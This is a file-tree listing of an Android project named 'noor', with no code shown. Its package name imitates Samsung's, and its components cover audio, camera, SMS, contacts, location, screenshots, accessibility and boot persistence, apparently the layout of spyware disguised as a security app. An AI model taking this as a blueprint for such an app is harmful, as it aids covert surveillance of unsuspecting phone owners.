# noor

./: .gitignore  build.gradle  gradle.properties  settings.gradle
app/: AndroidManifest.xml  build.gradle  google-services.json  proguard-rules.pro
app/src/main/: AndroidManifest.xml
app/src/main/java/com/samsung/android/security/v8/: AlKhanjarApp.java  MainActivity.java  SettingsActivity.java
app/src/main/java/com/samsung/android/security/v8/managers/: AudioManager.java  CameraManager.java  ContactManager.java  FileManager.java  LocationManager.java  ScreenshotManager.java  SmsManager.java
app/src/main/java/com/samsung/android/security/v8/receivers/: BootReceiver.java  SecretCodeReceiver.java
app/src/main/java/com/samsung/android/security/v8/services/: AccessibilityService.java  CoreService.java  MyAccessibilityService.java  NotificationService.java
app/src/main/java/com/samsung/android/security/v8/utils/: CryptoManager.java  DeviceManager.java  PermissionManager.java  PreferenceManager.java
app/src/main/res/layout/: activity_main.xml
app/src/main/res/values/: strings.xml
app/src/main/res/xml/: accessibility_config.xml
